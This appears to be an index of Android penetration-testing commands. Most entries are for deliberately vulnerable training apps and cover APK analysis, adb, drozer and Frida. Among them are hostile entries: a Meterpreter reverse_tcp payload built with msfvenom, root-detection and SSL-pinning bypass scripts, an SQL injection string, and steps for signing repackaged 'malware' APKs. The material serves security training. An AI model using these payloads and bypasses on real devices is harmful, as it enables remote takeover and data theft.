aapt dump badging app.apk
Alert! To view more content, click the description below a terminal command.
aapt dump badging app.apk
adb devices
apktool d target_app.apk -o output_apktool
apktool d AppName.apk
androguard analyze appka.apk
set payload android/meterpreter/reverse_tcp
bash script
adb shell input tap 760 745
adb bugreport
Burp Proxy Listeners
https://crt.sh/
apk-mitm AndroGoat.apk
dexdump -d classes.dex
jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=55555
adb shell am start -a android.intent.action.VIEW "allsafe://infosecadventures/congrats"
drozer run
drozer console connect
frida -U -f com.target.app -l analysis_script.js
frida -U -f infosecadventures.allsafe -l Intercept_Android_APK_Crypto_Operations.js
frida -U -f infosecadventures.allsafe -l secureflag.js
frida -U 4463 -l root_bypass.js
frida -U -f com.target.app --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida
adb push frida-server-17.2.16-android-arm64 /data/local/tmp/frida-server
msfvenom -p android/meterpreter/reverse_tcp
keytool -genkeypair
grep -r -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" temp_analysis/
adb shell am broadcast
cd shared_prefs
adb shell am startservice infosecadventures.allsafe/.challenges.RecorderService
adb shell am start -W -a android.intent.action.VIEW -d "insecureshop://com.insecureshop/web?url=http://192.168.1.14:9090/test.html"
https://www.jwt.io/
adb logcat
sudo docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf
d2j-apk-sign new_malware.apk
adb install-multiple *.apk
adb push C:\Users\user\Desktop\user.dat /sdcard/Android/data/infosecadventures.allsafe/files/
adb shell pm list packages
adb shell settings put global http_proxy <host-ip>:8080
adb shell screencap -p /data/local/tmp/test1.png
%'/**/OR/**/1=1--
sqlite3 database.db
msfconsole search type:exploit platform:android
apksigner sign --ks my-release-key.jks --in demo_malware.apk --out demo_malware2.apk